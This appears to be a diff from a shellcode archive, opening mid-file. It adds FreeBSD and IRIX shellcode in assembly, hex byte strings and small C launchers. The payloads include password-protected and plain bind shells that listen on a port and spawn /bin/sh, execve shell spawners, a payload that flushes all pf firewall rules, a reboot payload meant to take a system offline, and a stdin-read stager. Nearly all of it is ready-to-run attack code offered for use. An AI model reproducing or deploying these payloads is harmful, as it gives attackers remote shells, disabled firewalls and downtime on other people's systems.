"\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53\x54"
"\x5f\x52\x57\x54\x5e\x0f\x05";
Assembly Intel Source:
global _start
;
; Bindshell in 64 bit shellcode (written
; and tested on a FreeBSD 9.1 AMD64 OS)
;
; Author: Gitsnik
; Twitter: @dracyrys
; Passcode: R2CBw0cr
; 127 bytes
;
section .text
_start:
;
; int socket( 2, 1, 0 )
;
; socket will return a socket into rax
;
; 12 bytes
;
push byte 0x61
pop rax
push byte 0x02
pop rdi
push byte 0x01
pop rsi
cdq ; rdx is null
syscall ; socket( 2, 1, 0 )
;
; Swap our socket from RAX into RDI which is where
; the next few functions want it anyway
;
; xchg is 1 byte shorter than mov
;
; 2 bytes
xchg rdi, rax ; socket in rdi for bind() rax is now 2
;
; bind( sockfd, *addr, addrlen )
;
; We need to set up our serv_addr (which we know is 0,port,2)
; So load it all into RAX and push that. Note that because we want
; 7 bytes but the register is 8, we pad 0xff onto the back and then
; xor it to null to line everything up.
;
; 20 bytes
mov edx, 0xaaaa02ff
xor dl, 0xff
push rdx
mov rsi, rsp ; rsi points to our sockaddr *
cdq ; reset RDX
add al, 0x66 ; bind() is 0x68 but rax is already 0x02
add dl, 0x10 ; 16 (sizeof)
syscall
;
; listen is 0x6a
;
; listen( sockfd, backlog )
;
; bind() returns 0 on success, so add al, RDI already points at our
; sockfd, and we don't care what's in backlog but because it's a
; stack pointer from a few lines back the number is sufficiently high
; that it doesn't matter.
;
; 4 bytes
add al, 0x6a
syscall
;
; accept( sockfd, 0, 0 )
;
; accept() will return a new sockfd for us.
;
; 8 bytes
;
add al, 0x1e
xor rsi, rsi
cdq
syscall
;
; read( socket, buffer, length )
;
; Calls should read:
; rax: syscall number (0x03 on FreeBSD)
; rdi: client socket
; rsi: buffer address
; rdx: read size (0xf)
;
; We take the returned sockfd ( client ) from rax and load it into rdi
; as our second argument. We set RAX to be 0x03, as this is the syscall
; ID (reference: /usr/include/sys/syscall.h)
;
; Set rsi to be rsp-0xf to give us 0xf bytes of space for a buffer
; and set dl to be our length. RDX is still null because of the cdq we
; did earlier.
;
; When we are finished RAX will be the number of bytes read from the socket
; RDI will be our client socket
; RSI will contain the pointer to our string for passcode comparison
; RDX will be 0x000000000000000F
;
; 16 bytes
xchg rdi, rax
push byte 0x03 ; 0x03 is read() in FreeBSD
pop rax
push rdx ; Still null from cdq up top.
lea rsi, [rsp-0x10]
add dl, 0x10
syscall
;
; rsi has our string, rdi client socket
;
; 18 bytes
;
mov rax, 0x7263307742433252 ; Replace your 8 character passcode here.
push rdi ; save the socket
lea rdi, [rsi]
scasq
jz dup2setup
;
; Exit
;
; 8 bytes
;
xor rax, rax
inc rax
syscall
;
; Setup for dup2 loop
;
; 7 bytes
;
dup2setup:
pop rdi
mov rax, rdx ; RDX is dl, 0x10 but otherwise 0x00
; so we can do this and then just correct
; in the dup2 loop.
mov rsi, rdi
;
; dup2 loop
;
; 9 bytes
dup2:
dec rsi
mov al, 0x5a
syscall
jnz dup2
;
; Now for the big one. Let's set up our execve()
;
; At this point RAX is 0 so just null out rdx
;
; We need rdx to be null for the 3rd argument to execve()
;
; 23 bytes
cdq
add al, 0x3b ; execve()
mov rbx, 0x68732f2f6e69622f ; hs//nib/
; Argument one shell[0] = "/bin//sh"
push rdx ; null
push rbx ; hs//nib/
; We need pointers for execve()
push rsp ; *pointer to shell[0]
pop rdi ; Argument 1
; Argument two shell (including address of each argument in array)
push rdx ; null
push rdi ; address of shell[0]
; We need pointers for execve()
push rsp ; address of char * shell
pop rsi ; Argument 2
syscall

49
shellcodes/freebsd_x86/43504.asm Normal file
View file

@ -0,0 +1,49 @@
/*
-------------- FreeBSD/x86 - execv("/bin/sh") 23 bytes -------------------------
* AUTHOR : Tosh
* OS : BSDx86 (Tested on FreeBSD 8.1)
* EMAIL : tosh@tuxfamily.org
*/
#include <string.h>
#include <stdio.h>
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x54\x53\xb0\x3b\x50\xcd\x80";
int main(void)
{
void(*f)() = (void*)shellcode;
printf("Len = %d\n", sizeof(shellcode)-1);
f();
}
/*!
%define SYS_EXECV 59
section .text
global _start
_start:
xor eax, eax
push eax
push '//sh'
push '/bin'
mov ebx, esp
push eax
push esp
push ebx
mov al, SYS_EXECV
push eax
int 0x80
*/

47
shellcodes/freebsd_x86/43505.c Normal file
View file

@ -0,0 +1,47 @@
/*
* Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes'
* Type: Shellcode
* Author: antrhacks
* Platform: FreeBSD 8.0-RELEASE
*/
/* ASSembly
31 c0 xor %eax,%eax
50 push %eax
68 2d 46 61 6c push $0x6c61462d
89 e1 mov %esp,%ecx
50 push %eax
68 66 63 74 6c push $0x6c746366
68 69 6e 2f 70 push $0x702f6e69
68 2f 2f 73 62 push $0x62732f2f
89 e3 mov %esp,%ebx
50 push %eax
51 push %ecx
53 push %ebx
89 e1 mov %esp,%ecx
50 push %eax
51 push %ecx
53 push %ebx
b0 3b mov $0x3b,%al
50 push %eax
cd 80 int $0x80
31 c0 xor %eax,%eax
50 push %eax
50 push %eax
cd 80 int $0x80
*/
#include <stdio.h>
int main(){
char shellcode[] = "\x31\xc0\x50\x68\x2d\x46\x61\x6c\x89\xe1\x50\x68\x66\x63\x74\x6c"
"\x68\x69\x6e\x2f\x70\x68\x2f\x2f\x73\x62\x89\xe3\x50\x51\x53"
"\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd\x80\x31\xc0\x50\x50\xcd\x80";
printf("[*] ShellCode size (bytes): %d\n\n", sizeof(shellcode)-1 );
(*(void (*)())shellcode)();
return 0;
}

26
shellcodes/freebsd_x86/43506.c Normal file
View file

@ -0,0 +1,26 @@
/*
FreeBSD shellcode that binds /bin/sh to port 41254
Assembly code and explanation will be released on safemode.org soon.
Written by zillion (zillion at safemode.org)
*/
char shellcode[] =
"\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0"
"\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46"
"\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0"
"\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80"
"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff"
"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01"
"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff"
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

20
shellcodes/freebsd_x86/43507.c Normal file
View file

@ -0,0 +1,20 @@
/*
FreeBSD reboot() shellcode
This will halt a system, which takes it offline until someone reboots it.
Written by zillion (at safemode.org
*/
char shellcode[] =
"\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

18
shellcodes/irix/43508.c Normal file
View file

@ -0,0 +1,18 @@
char cmdshellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<_cmdshellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x08\xf4" /* addi $ra,$ra,2292 */
"\x23\xe4\xf7\x40" /* addi $a0,$ra,-2240 */
"\x23\xe5\xfb\x24" /* addi $a1,$ra,-1244 */
"\xaf\xe4\xfb\x24" /* sw $a0,-1244($ra) */
"\x23\xe6\xf7\x48" /* addi $a2,$ra,-2232 */
"\xaf\xe6\xfb\x28" /* sw $a2,-1240($ra) */
"\x23\xe6\xf7\x4c" /* addi $a2,$ra,-2228 */
"\xaf\xe6\xfb\x2c" /* sw $a2,-1236($ra) */
"\xaf\xe0\xfb\x30" /* sw $zero,-1232($ra) */
"\xa3\xe0\xf7\x47" /* sb $zero,-2233($ra) */
"\xa3\xe0\xf7\x4a" /* sb $zero,-2230($ra) */
"\x02\x04\x8d\x0c" /* syscall */
"\x01\x08\x40\x25" /* or $t0,$t0,$t0 */
"/bin/sh -c "
;

12
shellcodes/irix/43509.c Normal file
View file

@ -0,0 +1,12 @@
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<_shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x02\x14" /* addi $ra,$ra,532 */
"\x23\xe4\xfe\x08" /* addi $a0,$ra,-504 */
"\x23\xe5\xfe\x10" /* addi $a1,$ra,-496 */
"\xaf\xe4\xfe\x10" /* sw $a0,-496($ra) */
"\xaf\xe0\xfe\x14" /* sw $zero,-492($ra) */
"\xa3\xe0\xfe\x0f" /* sb $zero,-497($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;

104
shellcodes/irix/43510.c Normal file
View file

@ -0,0 +1,104 @@
/* 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso
*/
unsigned long int shellcode[] = {
0x2416fffd, /* li $s6, -3 */
0x02c07027, /* nor $t6, $s6, $zero */
0x01ce2025, /* or $a0, $t6, $t6 */
0x01ce2825, /* or $a1, $t6, $t6 */
0x240efff9, /* li $t6, -7 */
0x01c03027, /* nor $a2, $t6, $zero */
0x24020453, /* li $v0, 1107 (socket) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x3050ffff, /* andi $s0, $v0, 0xffff */
0x280d0101, /* slti $t5, $zero, 0x0101 */
0x240effee, /* li $t6, -18 */
0x01c07027, /* nor $t6, $t6, $zero */
0x01cd6804, /* sllv $t5, $t5, $t6 */
0x240e7350, /* li $t6, 0x7350 (port) */
0x01ae6825, /* or $t5, $t5, $t6 */
0xafadfff0, /* sw $t5, -16($sp) */
0xafa0fff4, /* sw $zero, -12($sp) */
0xafa0fff8, /* sw $zero, -8($sp) */
0xafa0fffc, /* sw $zero, -4($sp) */
0x02102025, /* or $a0, $s0, $s0 */
0x240effef, /* li $t6, -17 */
0x01c03027, /* nor $a2, $t6, $zero */
0x03a62823, /* subu $a1, $sp, $a2 */
0x24020442, /* li $v0, 1090 (bind) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02102025, /* or $a0, $s0, $s0 */
0x24050101, /* li $a1, 0x0101 */
0x24020448, /* li $v0, 1096 (listen) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02102025, /* or $a0, $s0, $s0 */
0x27a5fff0, /* addiu $a1, $sp, -16 */
0x240dffef, /* li $t5, -17 */
0x01a06827, /* nor $t5, $t5, $zero */
0xafadffec, /* sw $t5, -20($sp) */
0x27a6ffec, /* addiu $a2, $sp, -20 */
0x24020441, /* li $v0, 1089 (accept) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x3057ffff, /* andi $s7, $v0, 0xffff */
0x2804ffff, /* slti $a0, $zero, -1 */
0x240203ee, /* li $v0, 1006 (close) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02f72025, /* or $a0, $s7, $s7 */
0x2805ffff, /* slti $a1, $zero, -1 */
0x2806ffff, /* slti $a2, $zero, -1 */
0x24020426, /* li $v0, 1062 (fcntl) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x28040101, /* slti $a0, $zero, 0x0101 */
0x240203ee, /* li $v0, 1006 (close) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02f72025, /* or $a0, $s7, $s7 */
0x2805ffff, /* slti $a1, $zero, -1 */
0x28060101, /* slti $a2, $zero, 0x0101 */
0x24020426, /* li $v0, 1062 (fcntl) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 */
0x02c02027, /* nor $a0, $s6, $zero */
0x240203ee, /* li $v0, 1006 (close) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x02f72025, /* or $a0, $s7, $s7 */
0x2805ffff, /* slti $a1, $zero, -1 */
0x02c03027, /* nor $a2, $s6, $zero */
0x24020426, /* li $v0, 1062 (fcntl) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0xafa0fffc, /* sw $zero, -4($sp) */
0x24068cb0, /* li $a2, -29520 */
0x04d0ffff, /* bltzal $a2, pc-4 */
0x8fa6fffc, /* lw $a2, -4($sp) */
0x240fffc7, /* li $t7, -57 */
0x01e07827, /* nor $t7, $t7, $zero */
0x03eff821, /* addu $ra, $ra, $t7 */
0x23e4fff8, /* addi $a0, $ra, -8 */
0x8fedfffc, /* lw $t5, -4($ra) */
0x25adffbe, /* addiu $t5, $t5, -66 */
0xafedfffc, /* sw $t5, -4($ra) */
0xafa4fff8, /* sw $a0, -8($sp) */
0x27a5fff8, /* addiu $a1, $sp, -8 */
0x24020423, /* li $v0, 1059 (execve) */
0x0101010c, /* syscall */
0x240f7350, /* li $t7, 0x7350 (nop) */
0x2f62696e, /* .ascii "/bin" */
0x2f736842, /* .ascii "/sh", .byte 0xdummy */
};

29
shellcodes/irix/43511.c Normal file
View file

@ -0,0 +1,29 @@
/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso
*/
unsigned long int shellcode[] = {
0xafa0fffc, /* sw $zero, -4($sp) */
0x24067350, /* li $a2, 0x7350 */
/* dpatch: */ 0x04d0ffff, /* bltzal $a2, dpatch */
0x8fa6fffc, /* lw $a2, -4($sp) */
/* a2 = (char **) envp = NULL */
0x240fffcb, /* li $t7, -53 */
0x01e07827, /* nor $t7, $t7, $zero */
0x03eff821, /* addu $ra, $ra, $t7 */
/* a0 = (char *) pathname */
0x23e4fff8, /* addi $a0, $ra, -8 */
/* fix 0x42 dummy byte in pathname to shell */
0x8fedfffc, /* lw $t5, -4($ra) */
0x25adffbe, /* addiu $t5, $t5, -66 */
0xafedfffc, /* sw $t5, -4($ra) */
/* a1 = (char **) argv */
0xafa4fff8, /* sw $a0, -8($sp) */
0x27a5fff8, /* addiu $a1, $sp, -8 */
0x24020423, /* li $v0, 1059 (SYS_execve) */
0x0101010c, /* syscall */
0x2f62696e, /* .ascii "/bin" */
0x2f736842, /* .ascii "/sh", .byte 0xdummy */

14
shellcodes/irix/43512.c Normal file
View file

@ -0,0 +1,14 @@
/* 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso
*/
unsigned long int shellcode[] = {
0x24048cb0, /* li $a0, -0x7350 */
/* dpatch: */ 0x0490ffff, /* bltzal $a0, dpatch */
0x2804ffff, /* slti $a0, $zero, -1 */
0x240fffe3, /* li $t7, -29 */
0x01e07827, /* nor $t7, $t7, $zero */
0x03ef2821, /* addu $a1, $ra, $t7 */
0x24060201, /* li $a2, 0x0201 (513 bytes) */
0x240203eb, /* li $v0, SYS_read */
0x0101010c, /* syscall */
0x24187350, /* li $t8, 0x7350 (nop) */
};